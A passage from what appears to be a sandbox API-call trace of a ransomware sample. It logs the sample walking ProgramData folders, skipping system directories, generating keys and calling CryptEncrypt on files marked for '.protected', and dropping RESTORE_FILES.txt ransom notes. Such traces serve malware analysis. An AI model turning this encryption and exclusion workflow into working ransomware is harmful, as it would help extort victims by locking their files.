CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile40.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.255] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.255] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp") returned 86 [0093.255] StrStrIW (lpFirst="usertile41.bmp", lpSrch=".protected") returned 0x0 [0093.255] lstrcmpW (lpString1="usertile41.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.255] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.255] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile41.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.255] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.255] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp") returned 86 [0093.255] StrStrIW (lpFirst="usertile42.bmp", lpSrch=".protected") returned 0x0 [0093.256] lstrcmpW (lpString1="usertile42.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.256] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.256] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.256] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile42.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.256] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.256] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp") returned 86 [0093.256] StrStrIW (lpFirst="usertile43.bmp", lpSrch=".protected") returned 0x0 [0093.256] lstrcmpW (lpString1="usertile43.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.256] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.256] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.256] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile43.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.256] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.256] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp") returned 86 [0093.256] StrStrIW (lpFirst="usertile44.bmp", lpSrch=".protected") returned 0x0 [0093.256] lstrcmpW (lpString1="usertile44.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.256] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.256] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.256] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile44.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.256] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.256] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.257] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\RESTORE_FILES.txt") returned 89 [0093.257] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.257] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.257] lstrcmpiW (lpString1="guest.bmp.protected", lpString2="Windows") returned -1 [0093.257] lstrcmpiW (lpString1="guest.bmp.protected", lpString2="Program Files") returned -1 [0093.257] lstrcmpiW (lpString1="guest.bmp.protected", lpString2="Program Files (x86)") returned -1 [0093.257] lstrcmpiW (lpString1="guest.bmp.protected", lpString2="$Recycle.bin") returned 1 [0093.257] lstrcmpiW (lpString1="guest.bmp.protected", lpString2="System Volume Information") returned -1 [0093.257] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp.protected") returned 74 [0093.257] StrStrIW (lpFirst="guest.bmp.protected", lpSrch=".protected") returned=".protected" [0093.257] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.257] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.257] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.257] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.257] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.257] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.257] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\RESTORE_FILES.txt") returned 72 [0093.257] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.257] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.257] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.257] lstrcmpiW (lpString1="user.bmp.protected", lpString2="Windows") returned -1 [0093.257] lstrcmpiW (lpString1="user.bmp.protected", lpString2="Program Files") returned 1 [0093.257] lstrcmpiW (lpString1="user.bmp.protected", lpString2="Program Files (x86)") returned 1 [0093.257] lstrcmpiW (lpString1="user.bmp.protected", lpString2="$Recycle.bin") returned 1 [0093.257] lstrcmpiW (lpString1="user.bmp.protected", lpString2="System Volume Information") returned 1 [0093.257] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp.protected") returned 73 [0093.257] StrStrIW (lpFirst="user.bmp.protected", lpSrch=".protected") returned=".protected" [0093.257] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.257] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.258] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\RESTORE_FILES.txt") returned 72 [0093.258] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.259] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.259] lstrcmpiW (lpString1="Vault", lpString2="Windows") returned -1 [0093.259] lstrcmpiW (lpString1="Vault", lpString2="Program Files") returned 1 [0093.259] lstrcmpiW (lpString1="Vault", lpString2="Program Files (x86)") returned 1 [0093.259] lstrcmpiW (lpString1="Vault", lpString2="$Recycle.bin") returned 1 [0093.259] lstrcmpiW (lpString1="Vault", lpString2="System Volume Information") returned 1 [0093.259] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault") returned 38 [0093.259] lstrcmpW (lpString1="Vault", lpString2=".") returned 1 [0093.259] lstrcmpW (lpString1="Vault", lpString2="..") returned 1 [0093.259] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\*") returned 40 [0093.259] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.259] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.259] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.259] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.259] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.259] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.259] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\.") returned 40 [0093.259] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.259] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.259] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.259] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.259] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.259] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.259] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.259] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\..") returned 41 [0093.259] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.260] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.260] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.260] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.260] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.260] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.260] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.260] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.260] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\RESTORE_FILES.txt") returned 56 [0093.260] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.260] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.260] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.260] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\RESTORE_FILES.txt") returned 56 [0093.260] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\vault\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.260] lstrcmpiW (lpString1="VISIO", lpString2="Windows") returned -1 [0093.260] lstrcmpiW (lpString1="VISIO", lpString2="Program Files") returned 1 [0093.260] lstrcmpiW (lpString1="VISIO", lpString2="Program Files (x86)") returned 1 [0093.260] lstrcmpiW (lpString1="VISIO", lpString2="$Recycle.bin") returned 1 [0093.260] lstrcmpiW (lpString1="VISIO", lpString2="System Volume Information") returned 1 [0093.260] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\VISIO") returned 38 [0093.260] lstrcmpW (lpString1="VISIO", lpString2=".") returned 1 [0093.260] lstrcmpW (lpString1="VISIO", lpString2="..") returned 1 [0093.260] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\VISIO\\*") returned 40 [0093.260] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\VISIO\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.260] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.261] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.261] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.261] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.261] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.261] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\VISIO\\.") returned 40 [0093.261] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.261] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.261] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.261] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.261] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.261] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.261] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.261] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\VISIO\\..") returned 41 [0093.261] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.261] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.261] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.261] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.261] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.261] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.261] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.261] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.261] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\VISIO\\RESTORE_FILES.txt") returned 56 [0093.261] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.261] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.261] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.261] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.261] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\VISIO\\RESTORE_FILES.txt") returned 56 [0093.261] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\VISIO\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\microsoft\\visio\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.261] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.261] lstrcmpiW (lpString1="Windows", lpString2="Windows") returned 0 [0093.261] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.261] lstrcmpiW (lpString1="Windows Defender", lpString2="Windows") returned 1 [0093.261] lstrcmpiW (lpString1="Windows Defender", lpString2="Program Files") returned 1 [0093.261] lstrcmpiW (lpString1="Windows Defender", lpString2="Program Files (x86)") returned 1 [0093.261] lstrcmpiW (lpString1="Windows Defender", lpString2="$Recycle.bin") returned 1 [0093.261] lstrcmpiW (lpString1="Windows Defender", lpString2="System Volume Information") returned 1 [0093.261] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender") returned 49 [0093.262] lstrcmpW (lpString1="Windows Defender", lpString2=".") returned 1 [0093.262] lstrcmpW (lpString1="Windows Defender", lpString2="..") returned 1 [0093.262] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\*") returned 51 [0093.262] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.262] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.262] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.262] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.262] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.262] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.262] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\.") returned 51 [0093.262] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.262] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.262] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.262] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.262] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.262] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.262] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.262] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\..") returned 52 [0093.262] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.262] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.262] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.262] lstrcmpiW (lpString1="Definition Updates", lpString2="Windows") returned -1 [0093.262] lstrcmpiW (lpString1="Definition Updates", lpString2="Program Files") returned -1 [0093.262] lstrcmpiW (lpString1="Definition Updates", lpString2="Program Files (x86)") returned -1 [0093.262] lstrcmpiW (lpString1="Definition Updates", lpString2="$Recycle.bin") returned 1 [0093.262] lstrcmpiW (lpString1="Definition Updates", lpString2="System Volume Information") returned -1 [0093.262] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates") returned 68 [0093.262] lstrcmpW (lpString1="Definition Updates", lpString2=".") returned 1 [0093.262] lstrcmpW (lpString1="Definition Updates", lpString2="..") returned 1 [0093.263] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\*") returned 70 [0093.263] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.263] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.263] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.263] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.263] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.263] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.263] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\.") returned 70 [0093.263] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.263] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.263] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.263] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.263] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.263] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.263] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.263] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\..") returned 71 [0093.263] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.263] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.263] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.264] lstrcmpiW (lpString1="Backup", lpString2="Windows") returned -1 [0093.264] lstrcmpiW (lpString1="Backup", lpString2="Program Files") returned -1 [0093.264] lstrcmpiW (lpString1="Backup", lpString2="Program Files (x86)") returned -1 [0093.264] lstrcmpiW (lpString1="Backup", lpString2="$Recycle.bin") returned 1 [0093.264] lstrcmpiW (lpString1="Backup", lpString2="System Volume Information") returned -1 [0093.264] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup") returned 75 [0093.264] lstrcmpW (lpString1="Backup", lpString2=".") returned 1 [0093.264] lstrcmpW (lpString1="Backup", lpString2="..") returned 1 [0093.264] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\*") returned 77 [0093.264] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.264] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.264] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.264] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.264] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.264] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.264] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\.") returned 77 [0093.264] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.264] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.264] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.264] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.264] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.264] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.264] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.264] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\..") returned 78 [0093.264] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.264] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.264] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.264] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.264] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.264] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.265] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.265] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.265] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\RESTORE_FILES.txt") returned 93 [0093.265] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.265] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.265] FindNextFileW (in: hFindFile=0x47ba50, 